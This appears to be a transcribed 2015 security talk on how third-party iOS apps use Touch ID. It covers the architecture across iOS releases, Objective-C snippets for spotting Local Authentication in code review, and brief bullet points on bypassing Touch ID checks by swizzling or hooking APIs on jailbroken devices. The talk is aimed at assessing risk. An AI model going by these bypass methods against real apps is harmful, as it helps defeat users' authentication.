jamie bowser - a touch(id) of ios security
TRANSCRIPT
Copyright © 2015, CigitalCopyright © 2015, Cigital
A Touch(ID) of iOS Security
Copyright © 2015, CigitalCopyright © 2015, Cigital
About me…• Cigital (3 years)
• Technical Strategist - Mobile (iOS)• Sr. Consultant (iOS Tooling)• Consultant (MDM Implementation
and iOS Security guidelines)• KeyBank (12+ years)
• Application Security Program Owner (web, mobile, mainframe)
• Java Web Developer (external and internal sites)
• Other ( x+y/z years)• NASA UNIX Administrator / Web
administrator• Developer• iOS Developer (Touch Unlock by:
Reconditorium Limited)
Copyright © 2015, CigitalCopyright © 2015, Cigital
Presentation Scope
• In• Use of Touch ID in third-party
applications• How to spot Local Authentication• Bypass-ability
• Out• Apple Pay Usage• iOS (Apple) Usage
Copyright © 2015, CigitalCopyright © 2015, Cigital
TOUCHID OVERVIEW
Copyright © 2015, CigitalCopyright © 2015, Cigital
What really is TouchID
• Touch ID is Apple's biometric fingerprint authentication technology. • Reads fingerprint and stores a “mathematical representation” of
the fingerprint in the ”Secure Enclave”• Secure Enclave is a “walled off architecture” from the rest of the device
view hardware• Able to store multiple fingerprint representations
• Client Side Authentication• Biometric• Possible form of Second Factor Authentication
Copyright © 2015, CigitalCopyright © 2015, Cigital
TouchID Architecture
• Changed with each major release of iOS since released• Getting better.?.?.?.?.?.
• Currently 3 options to discuss• Option1 – iOS 7 Release - Initial TouchID release• Option 2 – iOS 8 Release• Option 3 – iOS 9 Release
Copyright © 2015, CigitalCopyright © 2015, Cigital
TouchID Architecture – Release 1
• Architecture is not visible to iOS Applications – other than Apple’s Applications
TouchID SensorSecure Enclave
Hardware protected connection
Fingerprint Representation
Local Authentication API
Apple ApplicationsThird-Party Applications
Copyright © 2015, CigitalCopyright © 2015, Cigital
Implementations – Release 1
• No Third-party Implementation Available • No “Public” API• Only Public API usage in Apple AppStore
Copyright © 2015, CigitalCopyright © 2015, Cigital
TouchID Architecture – Release 2
• Architecture becomes visible to iOS Applications – in addition to Apple’s Applications
TouchID SensorSecure Enclave
Hardware protected connection
Fingerprint Representation
Local Authentication API
Apple ApplicationsThird-Party Applications
Copyright © 2015, CigitalCopyright © 2015, Cigital
Implementations – Release 2
• Typical Implementation
Start
Check Local Auth API
Get Token in Keychain
Authenticate
Place token in Keychain **
Start
Use Token** Add attribute to Keychain entry that ties it to having a passcode on the device – not really associated to TouchID
Copyright © 2015, CigitalCopyright © 2015, Cigital
Implementations – Release 2
• Many Third-Party Application teams jumped in and implemented something• And not updated…
Copyright © 2015, CigitalCopyright © 2015, Cigital
TouchID Architecture – Release 3
• Architecture is visible to iOS Applications – in addition to Apple’s Applications (required iOS 9.x)
TouchID SensorSecure Enclave
Hardware protected connection
Fingerprint Representation
Local Authentication API
Apple ApplicationsThird-Party Applications
Security Framework
Copyright © 2015, CigitalCopyright © 2015, Cigital
Implementations – Release 3
• Typical Implementation
Start
Check Local Auth API**
Attempt to get token from Keychain
Authenticate
Place token in Keychain *
Start
Use Token* Add attribute to Keychain entry that ties it to having TouchID requirements
Trigger system checks
** Optional
Copyright © 2015, CigitalCopyright © 2015, Cigital
Implementations – Release 3
• Does require iOS Relese restrictions on users• Not everybody updates
• Can detect and do a weak, but only as strong as the weakest link
Copyright © 2015, CigitalCopyright © 2015, Cigital
HOW TO SPOT LOCAL AUTHENTICATION
Doing Source Code Review?
Copyright © 2015, CigitalCopyright © 2015, Cigital
Spotting Local Authentication
LAContext *context = [[LAContext alloc] init];__block NSString *message; // Show the authentication UI with our reason string.[context evaluatePolicy: LAPolicyDeviceOwnerAuthenticationWithBiometrics localizedReason: @"Unlock access to locked feature" reply:^(BOOL success, NSError *authenticationError) { if (success) { message = @"evaluatePolicy: succes"; } else { message = [NSString stringWithFormat:@"evaluatePolicy:
%@", authenticationError.localizedDescription]; }
[self printMessage:message inTextView:self.textView]; }];
Copyright © 2015, CigitalCopyright © 2015, Cigital
Spotting Local Authentication
SecAccessControlRef sacObject = SecAccessControlCreateWithFlags(kCFAllocatorDefault,kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,kSecAccessControlTouchIDAny |
kSecAccessControlApplicationPassword, &error);
NSData *secretPasswordTextData = [@"SECRET_PASSWORD_TEXT" dataUsingEncoding:NSUTF8StringEncoding];
NSDictionary *attributes = @{ (__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword, (__bridge id)kSecAttrService: @"SampleService", (__bridge id)kSecValueData: secretPasswordTextData, (__bridge id)kSecUseNoAuthenticationUI: @YES,
(__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacObject, (__bridge id)kSecUseAuthenticationContext: context };
OSStatus status = SecItemAdd((__bridge CFDictionaryRef)attributes, nil);
* kSecAccessControlTouchIDCurrentSet
Copyright © 2015, CigitalCopyright © 2015, Cigital
TOUCHID BY-PASSING
Copyright © 2015, CigitalCopyright © 2015, Cigital
TouchID By-passing
• When determining risk, consider the following:• Jailbroken Device• By-passable both API and Keychain Access Groups• Swizzle the API• Hook the Keychain API and remove Access Group when inserting
• SuccessID• Does not implement the Access Group removal• https://hexplo.it/successid-touchid-override-simulation/
• Non-Jailbroken Device• By-passable using API• Swizzle the API
Copyright © 2015, CigitalCopyright © 2015, Cigital
Questions
email: [email protected]
Copyright © 2015, Cigital